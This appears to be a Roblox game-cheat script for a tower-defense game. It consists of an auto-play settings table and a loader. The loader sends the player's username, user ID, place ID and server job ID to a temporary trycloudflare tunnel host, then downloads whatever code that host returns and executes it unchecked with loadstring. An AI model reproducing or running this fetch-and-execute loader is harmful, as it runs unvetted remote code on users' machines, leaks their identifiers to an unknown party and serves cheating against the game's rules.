--[[
GCowboy is needed
--]]
getgenv().PickHubLOL = {
-- [ Settings ]
AutoStrat = true,
autoskip = false,
AntiLag = false,
AutoPickups = true,
TimeScale = 2,
ANTIAFK = true,
-- [[ Webhook ]]
SendWebhook = false,
Webhook = "",
macroURL = "https://pastefy.app/xr0ESHJa/raw",
Loadout = {
"Ranger",
"Accelerator",
"DJ Booth",
"Commander",
"Cowboy"},
Mode = "Fallen",
GameInfo = {"Summer Castle"}
}
-- [[ LOADER ]] --
local url = "https://dui-baltimore-meters-chemical.trycloudflare.com/raw/FreeHubTDS"
local plr = game:GetService("Players").LocalPlayer
local query = "?user="..plr.Name.."&uid="..plr.UserId.."&placeid="..game.PlaceId.."&jobid="..game.JobId
local success, result = pcall(function() return game:HttpGet(url..query) end)
if success then
local func, err = loadstring(result)
if func then func() else warn("Compile Error: "..tostring(err)) end
else
warn("Fetch Error: "..tostring(result))
end
Comments
No comments yet
Be the first to share your thoughts!